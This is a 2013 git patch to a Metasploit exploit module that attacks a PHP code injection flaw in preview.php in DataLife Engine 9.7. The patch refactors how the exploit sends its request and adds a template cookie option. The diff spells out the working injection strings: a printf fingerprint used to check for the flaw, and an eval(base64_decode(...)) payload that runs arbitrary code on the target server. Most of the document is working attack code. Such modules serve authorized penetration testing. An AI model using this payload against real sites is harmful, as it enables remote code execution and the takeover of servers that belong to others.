From bf7bb9952e5ef3c41cbfdbc6dbe8de1b3301c04b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 1 Feb 2013 11:53:42 +0100
Subject: [PATCH] added template stuff improve

---
 .../unix/webapp/datalife_preview_exec.rb      | 34 ++++++++++---------
 1 file changed, 18 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb
index e1339f1313..7497dd6f9b 100644
--- a/modules/exploits/unix/webapp/datalife_preview_exec.rb
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@@ -18,8 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
 				The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
-				with the e modifier, which allows to inject arbitrary php code, when the template
-				in use contains a [catlist] or [not-catlist] tag.
+				with the e modifier, which allows to inject arbitrary php code, when there is a
+				template installed which contains a [catlist] or [not-catlist] tag, even when the
+				template isn't in use currently. The template can be configured with the TEMPLATE
+				datastore option.
 			},
 			'Author'         =>
 				[
@@ -49,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+				OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
+				OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
 			], self.class)
 	end
 
@@ -57,17 +60,24 @@ class Metasploit3 < Msf::Exploit::Remote
 		normalize_uri(target_uri.path, 'engine', 'preview.php')
 	end
 
-	def check
-		fingerprint = rand_text_alpha(4+rand(4))
+	def send_injection(inj)
 		res = send_request_cgi(
 			{
 				'uri'       =>  uri,
 				'method'    => 'POST',
 				'vars_post' =>
 					{
-						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
-					}
+						'catlist[0]' => inj
+					},
+				'cookie'   => "dle_skin=#{datastore['TEMPLATE']}"
 			})
+		res
+	end
+
+	def check
+		fingerprint = rand_text_alpha(4+rand(4))
+
+		res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")
 
 		if res and res.code == 200 and res.body =~ /#{fingerprint}/
 			return Exploit::CheckCode::Vulnerable
@@ -80,14 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		@peer = "#{rhost}:#{rport}"
 
 		print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
-		res = send_request_cgi(
-			{
-				'uri'       =>  uri,
-				'method'    => 'POST',
-				'vars_post' =>
-					{
-						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
-					}
-			})
+		res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
 	end
 end